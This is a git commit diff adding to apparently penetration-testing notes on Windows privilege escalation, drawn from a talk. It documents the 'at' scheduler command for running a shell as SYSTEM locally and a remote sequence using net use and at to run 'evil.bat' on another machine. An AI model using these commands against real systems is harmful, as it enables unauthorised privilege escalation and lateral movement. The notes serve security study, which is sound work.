Continued to add content from Rob's talk. Stopped at slide 35. More to come.

2025-10-29 16:56:59 +00:00 · 2014-01-22 21:54:18 -05:00 · 2014-01-22 21:54:18 -05:00 · 0f442d0f80
commit 0f442d0f80
parent 62a18ac3e0
1 changed files with 12 additions and 1 deletions
--- a/privesc/windows/index.md
+++ b/privesc/windows/index.md
@ -2,4 +2,15 @@

 Command that can be executed from the context of a shell prompt that help escalate or increase attacker privilege of the target.

-  * [UAC](uac.md) - How to bypass UAC.
+  * [UAC](uac.md) - How to bypass UAC.
+
+# General Commands
+### at (Scheduler)
+ * **Command with arguments**: `at [TIME] [cmd]`
+ * **Description**: This command can be used locally to escalate privilege to SYSTEM or be used across a network to execute commands on another system.
+ * **Examples**: 
+    * Locally - `at 13:20 /interactive cmd`
+    * Remotely - From http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607
+         * `net use \\[computername|IP] /user:DOMAIN\username password`
+         * `net time \\[computername|IP]`
+         * `at \\[computername|IP] 13:20 c:|temp\evil.bat`